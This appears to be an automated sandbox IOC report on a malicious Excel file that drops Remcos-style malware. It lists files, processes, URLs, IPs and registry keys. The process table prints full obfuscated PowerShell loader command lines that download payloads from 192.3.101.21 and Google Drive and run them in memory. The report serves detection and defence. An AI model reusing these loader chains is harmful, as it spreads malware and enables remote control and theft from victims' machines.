IOC Report
0001.xls

loading gif

Files

File Path
Type
Category
Malicious
0001.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 29 07:31:04 2024, Security: 1
initial sample
 malicious
C:\ProgramData\remcos\logs.dat
data
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestthingwhichigiventouformakebestappinesswogiven[1].hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
modified
 malicious
C:\Users\user\AppData\Local\Temp\htcuymda\htcuymda.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\seethebestthingsgivingrenergytomyentirelifeforgeth.VBs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
 malicious
C:\Users\user\Desktop\0001.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 29 15:30:56 2024, Security: 1
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethebestthingsgivingrenergytomyentirelifeforgetherback[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83A87E6E.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8D9EA708.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B763AB69.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C39C8A56.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\1vm3e1kt\1vm3e1kt.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (351)
dropped
C:\Users\user\AppData\Local\Temp\1vm3e1kt\1vm3e1kt.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\1vm3e1kt\1vm3e1kt.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\1vm3e1kt\1vm3e1kt.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\1vm3e1kt\CSC4B568FC3E3A64456AB5664CB529ACC2C.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\2aco12pb.tpa.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\RES7781.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 29 15:30:45 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RESC6F7.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 29 15:31:06 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\bd1f2yfi.uuk.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\bhv8BAD.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x2895011e, page size 32768, DirtyShutdown, Windows version 6.1
dropped
C:\Users\user\AppData\Local\Temp\bmolkgsr.w3a.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\bp4voxdn.3y1.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\bqyua5gi.fkt.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\htcuymda\CSCED218374D5764718ADCDD459E0E116EB.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\htcuymda\htcuymda.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (351)
dropped
C:\Users\user\AppData\Local\Temp\htcuymda\htcuymda.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\htcuymda\htcuymda.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\mpqqyenbumlfhmiakqc
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\napkge3j.t1g.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\psnzhgxs.kpi.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\s4f30m42.ypx.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\te0ecy2q.1pg.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\x1btpeuk.ydy.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\xkqeedhe.m5j.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\zqn4udhs.4ts.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DF3AE4293CD94DBA64.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Temp\~DF6A50370529641E4C.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF9A87B275199D53BC.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFA0B88F6D6B62A199.TMP
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei
data
dropped
C:\Users\user\Desktop\65330000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 29 15:30:56 2024, Security: 1
dropped
C:\Users\user\Desktop\65330000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
There are 37 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
 malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SYsTEm32\wInDoWspoWERShell\V1.0\POWeRSheLL.eXE" "poWERSHelL.exe -EX byPAss -NOp -w 1 -C DEVicEcREdeNTiaLDEpLoyMENt.Exe ; iex($(IEx('[syStem.TeXT.eNcOdInG]'+[chAR]58+[chAr]58+'UtF8.GetstRiNg([sYstEm.conVErt]'+[cHAR]58+[ChAr]58+'FrOMbASE64stRInG('+[CHAR]34+'JFRYOHMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYmVSRGVGSU5pVGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoTXR3U0FMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlXRlFYWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsV05uV1BtU3Vacyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSURNekQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR0NERFpyTkJNeXUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJhdUdtbnpkWiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3NJQ3lpZlhzeEkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFRYOHM6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xMDEuMjEvNDEyL3NlZXRoZWJlc3R0aGluZ3NnaXZpbmdyZW5lcmd5dG9teWVudGlyZWxpZmVmb3JnZXRoZXJiYWNrLnRJRiIsIiRFTnY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzZ2l2aW5ncmVuZXJneXRvbXllbnRpcmVsaWZlZm9yZ2V0aC5WQnMiLDAsMCk7U3RBUnQtc2xlZXAoMyk7c3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NnaXZpbmdyZW5lcmd5dG9teWVudGlyZWxpZmVmb3JnZXRoLlZCcyI='+[cHAr]0x22+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPAss -NOp -w 1 -C DEVicEcREdeNTiaLDEpLoyMENt.Exe
 malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\htcuymda\htcuymda.cmdline"
 malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SYsTEm32\wInDoWspoWERShell\V1.0\POWeRSheLL.eXE" "poWERSHelL.exe -EX byPAss -NOp -w 1 -C DEVicEcREdeNTiaLDEpLoyMENt.Exe ; iex($(IEx('[syStem.TeXT.eNcOdInG]'+[chAR]58+[chAr]58+'UtF8.GetstRiNg([sYstEm.conVErt]'+[cHAR]58+[ChAr]58+'FrOMbASE64stRInG('+[CHAR]34+'JFRYOHMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYmVSRGVGSU5pVGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoTXR3U0FMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlXRlFYWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsV05uV1BtU3Vacyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSURNekQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR0NERFpyTkJNeXUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJhdUdtbnpkWiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3NJQ3lpZlhzeEkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFRYOHM6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xMDEuMjEvNDEyL3NlZXRoZWJlc3R0aGluZ3NnaXZpbmdyZW5lcmd5dG9teWVudGlyZWxpZmVmb3JnZXRoZXJiYWNrLnRJRiIsIiRFTnY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzZ2l2aW5ncmVuZXJneXRvbXllbnRpcmVsaWZlZm9yZ2V0aC5WQnMiLDAsMCk7U3RBUnQtc2xlZXAoMyk7c3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NnaXZpbmdyZW5lcmd5dG9teWVudGlyZWxpZmVmb3JnZXRoLlZCcyI='+[cHAr]0x22+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPAss -NOp -w 1 -C DEVicEcREdeNTiaLDEpLoyMENt.Exe
 malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1vm3e1kt\1vm3e1kt.cmdline"
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsgivingrenergytomyentirelifeforgeth.VBs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigoR2VULVZBUmlhQmxFICcqbURSKicpLk5BTUVbMywxMSwyXS1KT0luJycpKCAoKCc3JysnVk1pbWFnZVVybCA9IHptd2h0dHBzOi8vZHJpdmUuJysnZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHptdzs3Vk13ZWJDbGknKydlbnQgPSBOZXctT2JqZWN0JysnIFN5c3RlbS5OZXQuV2ViQ2xpZW50OzdWTWknKydtYWdlQnl0ZXMgPSA3Vk13ZWJDbGllbnQuRG93bmxvYWREYXRhKDdWTWltYWdlVXJsKTs3Vk1pbWFnZVRleHQgPSAnKydbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVCcrJ0YnKyc4LkdldFN0cmluZyg3Vk1pbWFnZUJ5dGVzKTs3Vk1zdGFydEZsYWcgPSB6bXc8PEJBUycrJ0U2NF9TVEFSVD4+em13OzdWTWVuZEZsYWcgPSB6bXc8PEJBU0U2JysnNF9FTkQ+Pnptdzs3Vk1zdGFydEluJysnZGV4ID0gNycrJ1ZNaW1hZ2VUZXh0LkluZGV4T2YoN1ZNc3RhcnRGbGFnKTs3Vk1lbmRJbmRleCA9IDdWTWltYWcnKydlVGV4dC5JbmRleE9mKDdWTWVuZEZsYWcpOzdWTXN0JysnYXJ0SW5kZXggLScrJ2dlIDAgLWFuZCA3Vk1lbmRJbmQnKydleCAtZ3QgN1ZNc3RhcnRJbmRleCcrJzs3Vk1zdGFydEluZGV4ICs9IDdWTXN0YXJ0RmxhZy5MZW5ndGg7N1ZNJysnYmFzZTY0TGVuZ3RoID0gJysnNycrJ1ZNZW5kSW5kZXggLSA3VicrJ01zdGEnKydydEluZGV4OzdWTWJhc2U2NENvbW1hbmQgPSA3Vk1pbWFnZVRleHQuU3ViJysnc3RyaW5nKDdWTXN0YXJ0SW5kZXgsIDdWTWJhc2U2NExlbmd0aCk7N1ZNJysnYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoN1YnKydNYicrJ2FzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHJwOCBGb3JFYWNoLU9iamVjdCB7IDdWTV8gfSlbLTEuLi0oN1ZNYmEnKydzZTY0Q29tbWFuZC5MZW5ndGgpXTs3Vk1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm8nKydtQmFzZTY0U3RyaW5nKDdWTWJhc2U2NFJldmVycycrJ2VkKTs3Vk0nKydsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoN1ZNY29tbWFuZEJ5dGVzKTs3Vk12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHptd1ZBSXptdyk7N1ZNdmFpTWV0aG9kLkludm9rZSg3Vk1udWxsLCAnKydAKHptd3R4dC5UVFInKydDTUxMLzIxNC8xMi4xJysnMDEuMy4yOTEvLzpwdHRoem13LCB6bXdkZXNhdGl2YWRvem13LCB6bXdkZXNhdGl2YScrJ2Rvem13LCB6bXdkZXNhdGl2YWRvem13LCB6bXdDYXNQb2x6bXcsIHptd2Rlc2F0aXZhZCcrJ296bXcsIHptd2Rlc2F0aXZhZG96bXcsem13ZGVzYXRpdmFkb3ptdyx6bXdkZXNhdGl2YWRvem13LHptd2Rlc2F0aXYnKydhZG96bXcsem13ZGVzYXRpdmFkb3ptdyx6bXdkZXNhdGl2JysnYWRveicrJ213LHptdzF6bXcsem13ZGVzYXRpdmFkb3ptdykpOycpICAtckVQbEFDZSAncnA4JyxbQ0hhcl0xMjQgIC1jcmVQbGFDRSAgKFtDSGFyXTEyMitbQ0hhcl0xMDkrW0NIYXJdMTE5KSxbQ0hhcl0zOS1jcmVQbGFDRShbQ0hhcl01NStbQ0hhcl04NitbQ0hhcl03NyksW0NIYXJdMzYpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((GeT-VARiaBlE '*mDR*').NAME[3,11,2]-JOIn'')( (('7'+'VMimageUrl = zmwhttps://drive.'+'google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zmw;7VMwebCli'+'ent = New-Object'+' System.Net.WebClient;7VMi'+'mageBytes = 7VMwebClient.DownloadData(7VMimageUrl);7VMimageText = '+'[System.Text.Encoding]::UT'+'F'+'8.GetString(7VMimageBytes);7VMstartFlag = zmw<<BAS'+'E64_START>>zmw;7VMendFlag = zmw<<BASE6'+'4_END>>zmw;7VMstartIn'+'dex = 7'+'VMimageText.IndexOf(7VMstartFlag);7VMendIndex = 7VMimag'+'eText.IndexOf(7VMendFlag);7VMst'+'artIndex -'+'ge 0 -and 7VMendInd'+'ex -gt 7VMstartIndex'+';7VMstartIndex += 7VMstartFlag.Length;7VM'+'base64Length = '+'7'+'VMendIndex - 7V'+'Msta'+'rtIndex;7VMbase64Command = 7VMimageText.Sub'+'string(7VMstartIndex, 7VMbase64Length);7VM'+'base64Reversed = -join (7V'+'Mb'+'ase64Command.ToCharArray() rp8 ForEach-Object { 7VM_ })[-1..-(7VMba'+'se64Command.Length)];7VMcommandBytes = [System.Convert]::Fro'+'mBase64String(7VMbase64Revers'+'ed);7VM'+'loadedAssembly = [System.Reflection.Assembly]::Load(7VMcommandBytes);7VMvaiMethod = [dnlib.IO.Home].GetMethod(zmwVAIzmw);7VMvaiMethod.Invoke(7VMnull, '+'@(zmwtxt.TTR'+'CMLL/214/12.1'+'01.3.291//:ptthzmw, zmwdesativadozmw, zmwdesativa'+'dozmw, zmwdesativadozmw, zmwCasPolzmw, zmwdesativad'+'ozmw, zmwdesativadozmw,zmwdesativadozmw,zmwdesativadozmw,zmwdesativ'+'adozmw,zmwdesativadozmw,zmwdesativ'+'adoz'+'mw,zmw1zmw,zmwdesativadozmw));') -rEPlACe 'rp8',[CHar]124 -crePlaCE ([CHar]122+[CHar]109+[CHar]119),[CHar]39-crePlaCE([CHar]55+[CHar]86+[CHar]77),[CHar]36))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\mpqqyenbumlfhmiakqc"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\wjwiyxyvivdsjteetbolyxd"
 malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\hljbzpjxwdvxtzshkmjmbbyzqg"
 malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7781.tmp" "c:\Users\user\AppData\Local\Temp\htcuymda\CSCED218374D5764718ADCDD459E0E116EB.TMP"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC6F7.tmp" "c:\Users\user\AppData\Local\Temp\1vm3e1kt\CSC4B568FC3E3A64456AB5664CB529ACC2C.TMP"
There are 9 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://192.3.101.21/412/seethebestthingsgivingrenergytomyentirelifeforgetherback.tIF
192.3.101.21
 malicious
http://192.3.101.21/412/BR/seemybestthingwhichigiventouformakebestappinesswogiven.hta
192.3.101.21
 malicious
cokka.duckdns.org
malicious
http://192.3.101.21/412/LLMCRTT.txt
192.3.101.21
 malicious
http://b.scorecardresearch.com/beacon.js
unknown
http://acdn.adnxs.com/ast/ast.js
unknown
http://www.imvu.comr
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
unknown
http://ocsp.entrust.net03
unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
unknown
https://contoso.com/License
unknown
https://support.google.com/chrome/?p=plugin_flash
unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
unknown
http://www.nirsoft.net
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
unknown
http://www.imvu.com/O
unknown
http://go.micros
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://192.3.101.21/412/BR/seemybestthingwhichigiventouformakebestappinesswogiven.htahttp://192.3.10
unknown
http://cache.btrll.com/default/Pix-1x1.gif
unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
unknown
https://www.google.com
unknown
http://192.3.101.21/qq
unknown
http://192.3.101.21/
unknown
http://geoplugin.net/json.gp/C
unknown
http://o.aolcdn.com/ads/adswrappermsni.js
unknown
http://192.3.101.21/iq
unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js
unknown
http://www.msn.com/?ocid=iehp
unknown
https://acesso.run/WP8tfj?&song=snotty&attendant=malicious&rent=unbiased&mandolin=reminiscent&vase=p
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
unknown
http://static.chartbeat.com/js/chartbeat.js
unknown
http://www.msn.com/de-de/?ocid=iehp
unknown
https://acesso.run/-o
unknown
https://drive.usercontent.google.com
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
unknown
https://login.yahoo.com/config/login
unknown
https://acesso.run/
unknown
http://192.3.101.21/412/BR/seemybestthingwhichigiventouformakebestappinesswogiven.hta...a
unknown
http://www.nirsoft.net/
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
unknown
http://192.3.101.21/412/BR/seemybestthingwhichigiventouformakebestappinesswogiven.htaUKWWS
unknown
http://go.cr
unknown
http://192.3.101.21/412/BR/seemybestthingwhichigiventouformakebestappinesswogiven.hta...W
unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
unknown
https://acesso.run/e
unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
unknown
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
unknown
http://nuget.org/NuGet.exe
unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey
unknown
http://crl.entrust.net/server1.crl0
unknown
http://192.3.101.21/412/BR/seemybestthingwhichigiventouformakebestappinesswogiven.htaC:
unknown
https://contextual.media.net/8/nrrV73987.js
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
https://acesso.run/WP8tfj?&song=snotty&attendant=malicious&rent=unbiased&mandolin=reminiscent&vase=plausible&luggage=quick&membership=acoustic&clasp
172.67.162.95
http://192.3.101.21/412/seethebestthingsgivingrenergytomyentirelifeforgetherback.tIFh
unknown
https://contextual.media.net/
unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
unknown
http://192.3.101.21/412/BR/seemybestthingwhichigiventouformakebestappinesswogiven.htaccC:
unknown
http://192.3.101.21/412/BR/seemybestthingwhichigiventouformakebestappinesswogiven.hta...
unknown
http://192.3.101.21/412/seethebestthingsgivingrenergytomyentirelifeforgetherback.tIFp
unknown
http://www.msn.com/
unknown
http://192.3.101.21/412/seethebe
unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://192.3.101.21/412/BR/seemybestthingwhichigiventouformakebestappinesswogiven.hta8g
unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
unknown
http://192.3.101.21/412/BR/seemybestthingwhichigiventouformakebestappinesswogiven.htaez
unknown
https://drive.google.com
unknown
http://cdn.at.atwola.com/_media/uac/msn.html
unknown
https://www.google.com/accounts/servicelogin
unknown
http://192.3.101.21/412/BR/seemybestthingwhichigiventouformakebestappinesswogiven.htaU
unknown
http://192.3.101.21/412/BR/seemybestthingwhichigiventouformakebestappinesswogiven.htanisc
unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
unknown
https://secure.comodo.com/CPS0
unknown
http://192.3.101.21/412/seethebestthingsgivingrenergytomyentirelifeforgetherback.tIFoNdll
unknown
https://policies.yahoo.com/w3c/p3p.xml
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://www.msn.com/advertisement.ad.js
unknown
http://www.ebuddy.com
unknown
There are 84 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
cokka.duckdns.org
192.3.101.193
 malicious
acesso.run
172.67.162.95
geoplugin.net
178.237.33.50
drive.google.com
142.250.184.206
drive.usercontent.google.com
172.217.16.193

IPs

IP
Domain
Country
Malicious
192.3.101.21
unknown
United States
malicious
192.3.101.193
cokka.duckdns.org
United States
malicious
172.67.162.95
acesso.run
United States
104.21.74.191
unknown
United States
142.250.184.206
drive.google.com
United States
172.217.16.193
drive.usercontent.google.com
United States
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
